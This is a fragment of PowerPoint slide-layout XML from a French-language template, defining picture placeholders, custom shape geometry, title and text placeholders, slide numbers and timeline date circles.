          <a:xfrm>
            <a:off x="3" y="3911568"/>
            <a:ext cx="4333651" cy="2355826"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4333651"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX1" fmla="*/ 4333651 w 4333651"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2355826"/>
              <a:gd name="connsiteX2" fmla="*/ 4333651 w 4333651"/>
              <a:gd name="connsiteY2" fmla="*/ 2355826 h 2355826"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4333651"/>
              <a:gd name="connsiteY3" fmla="*/ 2355826 h 2355826"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4333651" h="2355826">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4333651" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4333651" y="2355826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="235582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3" name="Espace réservé pour une image  52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{567D379F-C1D1-418C-82C4-2B96689A46F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8461453" y="1458414"/>
            <a:ext cx="3721306" cy="2345723"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3721306"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX1" fmla="*/ 3721306 w 3721306"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX2" fmla="*/ 3721306 w 3721306"/>
              <a:gd name="connsiteY2" fmla="*/ 2345723 h 2345723"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3721306"/>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3721306" h="2345723">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3721306" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721306"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1" name="Espace réservé pour une image  50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6576C3BA-8C24-4A7A-ADC4-EEACA520F6EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449405" y="1458414"/>
            <a:ext cx="3904616" cy="2345723"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3904616"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX1" fmla="*/ 3904616 w 3904616"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX2" fmla="*/ 3904616 w 3904616"/>
              <a:gd name="connsiteY2" fmla="*/ 2345723 h 2345723"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3904616"/>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3904616" h="2345723">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3904616" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3904616"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9" name="Espace réservé pour une image  48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E03C65BE-3C3F-41E9-AFA0-DF2444C69015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3" y="1458414"/>
            <a:ext cx="4333651" cy="2345723"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4333651"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX1" fmla="*/ 4333651 w 4333651"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2345723"/>
              <a:gd name="connsiteX2" fmla="*/ 4333651 w 4333651"/>
              <a:gd name="connsiteY2" fmla="*/ 2345723 h 2345723"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4333651"/>
              <a:gd name="connsiteY3" fmla="*/ 2345723 h 2345723"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4333651" h="2345723">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4333651" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4333651" y="2345723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2345723"/>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6" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FB58295-9D50-49E8-A97E-AA8D2F48F8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"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0B76C5E4-5344-4E5F-BDA5-C8C0CD68AD88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Image 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75646A25-9A45-4E83-80EA-3DEBFDAE06D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9" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E057F96-AA13-484F-A6D7-BD00A55CFA69}"/>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0" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AB2AE01-44B5-487B-B4DD-88F8EF084AB2}"/>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1" name="Groupe 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2594962-A3A4-4E6B-A861-D207463E938C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8DFFA7-29D1-4388-9ACE-48B4807C1B84}"/>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3" name="Rectangle 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8348F43F-8F9E-47B6-AAE3-9846CE9A6C1E}"/>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4" name="Groupe 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{002E5617-C2B2-482C-B6F6-825316861AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3DD05C2-87BD-4F61-8F4F-E80A82DCEF84}"/>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6" name="Rectangle 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEBEBE87-83E6-4D95-982F-4452FECEB7B7}"/>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485983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 Subtitle + Free">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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38" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{103B1AB7-7369-49B3-BA6E-817F3D39F740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24"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7DCFF88B-57DB-4271-9F4B-AD9534589F85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Image 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{233793CE-1046-439C-9492-05559A6477A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21" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0652032E-A7DB-401F-AE39-DF783484AF37}"/>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22" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC1FCC5-E4EC-4798-8ECF-54F11A66BA88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525010" y="1003988"/>
            <a:ext cx="11095489"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23" name="Espace réservé pour une image  22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D425ABA6-7442-4187-BEE5-2476AEFA1A67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="1458413"/>
            <a:ext cx="12191998" cy="4808981"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191998"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX1" fmla="*/ 12191998 w 12191998"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4808981"/>
              <a:gd name="connsiteX2" fmla="*/ 12191998 w 12191998"/>
              <a:gd name="connsiteY2" fmla="*/ 3050377 h 4808981"/>
              <a:gd name="connsiteX3" fmla="*/ 12156270 w 12191998"/>
              <a:gd name="connsiteY3" fmla="*/ 3404788 h 4808981"/>
              <a:gd name="connsiteX4" fmla="*/ 10433383 w 12191998"/>
              <a:gd name="connsiteY4" fmla="*/ 4808981 h 4808981"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 12191998"/>
              <a:gd name="connsiteY5" fmla="*/ 4808981 h 480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4808981">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12191998" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12191998" y="3050377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12156270" y="3404788"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11992285" y="4206159"/>
                  <a:pt x="11283233" y="4808981"/>
                  <a:pt x="10433383" y="4808981"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="4808981"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Groupe 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75DC650E-1C96-43DB-9910-FEFD46EF2939}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69D85A78-DA6F-44F0-852D-CAFFBBA0E001}"/>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8" name="Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80907A7-26AC-4946-9410-2D2B6CF8682B}"/>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19" name="Groupe 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19FF606E-1176-42C6-A2B4-B446399494C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E9D307C-BB1D-4B6D-9B15-D1D2679EA7E8}"/>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4" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD657C2-A48D-4E54-AC51-2ED42AF410BE}"/>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1074800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 Subtitle + Timeline with pict">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16" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA664725-0C54-4F40-8F5E-D452D31584B1}"/>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15D46936-0ABB-4356-B711-F34897ADBC66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Image 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A69E9A6-07D8-4054-A6D8-F777A8DE71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7" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EA3F656-A5B7-4460-B271-38DB00342570}"/>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9" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3675B93A-B13B-48B5-86E3-0CA23A704FEE}"/>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22" name="Espace réservé pour une image  21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{384C9D10-BB98-4E7C-A5EF-3561E2F85CA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="1458413"/>
            <a:ext cx="12191998" cy="2889196"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191998"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2889196"/>
              <a:gd name="connsiteX1" fmla="*/ 12191998 w 12191998"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2889196"/>
              <a:gd name="connsiteX2" fmla="*/ 12191998 w 12191998"/>
              <a:gd name="connsiteY2" fmla="*/ 956428 h 2889196"/>
              <a:gd name="connsiteX3" fmla="*/ 12156270 w 12191998"/>
              <a:gd name="connsiteY3" fmla="*/ 1345938 h 2889196"/>
              <a:gd name="connsiteX4" fmla="*/ 10433383 w 12191998"/>
              <a:gd name="connsiteY4" fmla="*/ 2889196 h 2889196"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 12191998"/>
              <a:gd name="connsiteY5" fmla="*/ 2889196 h 288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2889196">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12191998" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12191998" y="956428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12156270" y="1345938"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11992285" y="2226673"/>
                  <a:pt x="11283233" y="2889196"/>
                  <a:pt x="10433383" y="2889196"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2889196"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du texte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57219436-8D8C-480A-ABF8-67564CF0ABDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525011" y="3987609"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Espace réservé du texte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E11F4086-4148-4A53-9424-DD71BEA78867}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354347" y="3987609"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Espace réservé du texte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6B4BB3-4BAC-4945-BE9D-F96B5402C64B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183683" y="3987609"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Espace réservé du texte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{048C14C2-4126-4F14-BC19-0AE90AB54411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9013020" y="3987609"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
